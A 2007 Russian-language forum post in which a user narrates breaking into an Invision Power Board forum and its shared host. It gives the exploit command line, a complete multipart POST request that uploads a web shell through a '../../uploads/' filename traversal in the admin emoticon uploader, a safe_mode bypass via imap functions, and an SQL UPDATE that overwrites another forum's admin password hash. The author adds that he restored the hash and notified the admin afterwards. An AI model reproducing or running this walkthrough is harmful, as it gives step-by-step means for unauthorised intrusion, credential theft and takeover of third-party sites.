Перейти из форума на сайт.

НовостиФайловые архивы
ПоискАктивные темыТоп лист
ПравилаКто в on-line?
Вход Забыли пароль? Первый раз на этом сайте? Регистрация
Компьютерный форум Ru.Board » IkonBoard и другие форумы » Invision Board » Уязвимость форума IPB

Модерирует : Antuan, Dekker

 Версия для печати • ПодписатьсяДобавить в закладки

Открыть новую тему     Написать ответ в эту тему

kerimchik



Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Запустил древний, но ещё очень даже актуальный сплоит r57ipb.pl от всё той же RST примерно так:
 
r57ipb.pl hack_this_forum.ru / 1 0
 
где
 
hack_this_forum.ru - сайт, на котором я хотел тестить шелл.
/ - папка с форумом
1 - id пользователя, чей пароль мог бы мне понадобиться
0 - версия ветки 1
 
Уже через несколько секунд сплоит вернул мне хэш админа. Испытывая сочувствие к своему процессору (день-то был довольно жаркий), я его пожалел и пошёл на http://passcracking.ru, где сразу же и выяснил, что зря жалел, так как пароль состоял из шести цифр. Я залогинился на форум, зашёл в админку, так… и где здесь “залить шелл”? А заливать шелл надо было через смайлики.
 
Первая попытка залить файл была безуспешной. Доступ на запись в папку /html/emotions/ был запрещён. Следовательно, надо было аплоудить в другую папку, например в /uploads/. Запустив программу со скромным названием InetCrack я стал составлять запрос. Пользовался я уже известным способом заливки шелла в IPB.
 
POST hack_this_forum.ru/admin.php?adsess=354a271346466c810bb70db3e129d17b HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: hack_this_forum.ru/admin.php?adsess=354a271346466c810bb70db3e129d17b&act=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 9.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=1; pass_hash=ae75aa292903a0517b4c710b1e4a4955;
 
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"
 
354a271346466c810bb70db3e129d17b
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"
 
emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"
 
op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"
 
20000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/view_uploads.php"
Content-Type: application/octet-stream
 
<? echo "Add your shell here."; ?>
-----------------------------7d43942c405bc--
 
Обратившись теперь www.hack_this_forum.ru/uploads/view_uploads.php я увидел знакомый r57shell. То, что на сервере php работает в безопасном режиме, я даже и не сомневался. Зато я мог просматривать файлы функциями обхода ограничений imap_list, imap_body. Просмотрев конфиги форума я нашёл MySQL-ный аккуант, и обратился к базе запросом :
 
SHOW DATABASES
 
На сервере было порядка двухсот баз, но у моего юзера был доступ только к своей. Я опять обратился к шеллу и решил подняться из своей директории повыше. Здесь, в папке /home/hosts/, и лежали все сайты: от страниц Васи Пупкина, до сайтов правительственных организаций. Я просмотрел многие из них, но не нашёл ничего интересного, кроме рутового пароля к MySQL на одном более менее крупном хосте. Однако в папку с главным сайтом меня не пускали. Зайдя на главную страницу сайта я увидел ссылку на форум. И этот форум был всё тот же IPB, причем версии 1.3. Но эти админы были немного умнее и версия была с заплаткой. "Зачем использовать SQL-инъекцию в форуме если у меня имеется рутовый доступ к MySQL? " — подумал я и обратился к главной базе с запросом:
 
UPDATE ibf_members SET password='202CB962AC59075B964B07152D234B70' WHERRE id='1'
 
Войдя в админку я по быстрому залил шелл вышеописанным способом. Каково было моё удивление, когда я увидел, что safe_mode в этой папке был отключен. Я уже хотел было вставить свой текст во все найденные командой find файлы index.php, но... что-то меня остановило. Я подумал, что взламывать безобидные сайты, принося вред их администраторам и Web-мастерам, не пойдет на пользу ни мне, ни кому-либо другому — дело это  гадкое и бесполезное. Я поменял хэш админа на тот, который был и отправил ему письмо. Хотя админы наградили меня только "спасибом" , я был рад, что сделал что-то полезное вместо того, чтобы напакостить.
 
 
 
 
Что это такое уважаемые?

Всего записей: 40 | Зарегистр. 16-11-2005 | Отправлено: 09:37 13-08-2007 | Исправлено: kerimchik, 09:38 13-08-2007
Открыть новую тему     Написать ответ в эту тему

Компьютерный форум Ru.Board » IkonBoard и другие форумы » Invision Board » Уязвимость форума IPB


Реклама на форуме Ru.Board.

Powered by Ikonboard "v2.1.7b" © 2000 Ikonboard.com
Modified by Ru.B0ard
© Ru.B0ard 2000-2024

BitCoin: 1NGG1chHtUvrtEqjeerQCKDMUi6S6CG4iC

Рейтинг.ru